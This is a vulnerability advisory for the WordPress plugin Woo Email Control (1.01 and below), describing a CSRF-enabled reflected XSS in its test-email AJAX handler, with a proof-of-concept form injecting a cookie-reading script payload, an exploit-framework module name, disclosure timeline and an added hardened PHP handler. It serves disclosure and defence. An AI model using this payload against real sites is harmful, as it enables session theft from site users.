Homepage
https://wordpress.org/plugins/woo-email-control/
Overview
Due to a lack of encoding and CSRF mitigation in the test_email function, found on line 106 of classes/class-wooctrl.php, it is possible to automate a request to the AJAX handler for the wooctrl_send_test_email action, which will reflect the specified script back to the end user.
CVSS Score
4.8
CVSS Vector
(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)
Versions Affected
1.01 and below
Solution
Upgrade to version 1.02
Proof of Concept
    <form method="post" action="http://<target>/wp-admin/admin-ajax.php?action=wooctrl_send_test_email">
        <input type="text" name="email_class" value="WC_Email_Customer_New_Account">
        <input type="text" name="recipient" value="user@user.com<img src=x onerror=alert(document.cookie)>">
        <input type="submit" value="Test">
    </form>
WordPress Exploit Framework Module
exploits/woo_email_control_reflected_xss_shell_upload
WPVDB-ID
Pending
Disclosure Timeline
2016-07-18: Identified vulnerability, contacted vendor with POC and a patch.
2016-07-18: Vendor released patch.
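
The two gaps named in the overview (no CSRF mitigation, no encoding of the reflected value) can be closed in an AJAX handler as sketched below. This is an added example, not the plugin's code or the vendor's 1.02 patch. The function name, nonce action, `nonce` field name and the `wp_mail()` stand-in are assumptions, and it expects to run inside a WordPress plugin with WooCommerce active.

```php
<?php
// Added example: hypothetical hardened handler, not the plugin's 1.02 code.
// Assumes a WordPress plugin context with WooCommerce loaded.

add_action( 'wp_ajax_wooctrl_send_test_email', 'example_wooctrl_send_test_email' );

function example_wooctrl_send_test_email() {
    // CSRF: reject requests without a valid nonce (terminates with 403).
    // 'example_wooctrl_test_email' and the 'nonce' field are assumed names.
    check_ajax_referer( 'example_wooctrl_test_email', 'nonce' );

    // Authorization: only users who can manage the shop may send test mail.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // Validation: recipient must survive sanitizing as a valid address,
    // so appended markup never reaches the mailer or the response.
    $recipient = isset( $_POST['recipient'] )
        ? sanitize_email( wp_unslash( $_POST['recipient'] ) )
        : '';
    if ( ! is_email( $recipient ) ) {
        wp_send_json_error( array( 'message' => 'Invalid recipient' ), 400 );
    }

    // Allowlist: email_class must be a class registered with the WooCommerce mailer.
    $class  = isset( $_POST['email_class'] )
        ? sanitize_text_field( wp_unslash( $_POST['email_class'] ) )
        : '';
    $emails = WC()->mailer()->get_emails();
    if ( ! isset( $emails[ $class ] ) ) {
        wp_send_json_error( array( 'message' => 'Unknown email class' ), 400 );
    }

    // Stand-in for the plugin's own send routine, which the advisory does not show.
    $subject = 'Test: ' . $emails[ $class ]->get_title();
    $sent    = wp_mail( $recipient, $subject, 'Test message' );

    // Output: JSON content type plus HTML-encoding of the echoed value,
    // in case the client inserts the message into the page as markup.
    wp_send_json_success( array(
        'message' => sprintf(
            'Test email %s to %s',
            $sent ? 'sent' : 'not sent',
            esc_html( $recipient )
        ),
    ) );
}
```

The admin page that issues the request has to embed a matching value from `wp_create_nonce()` in the assumed `nonce` field, otherwise every request is rejected.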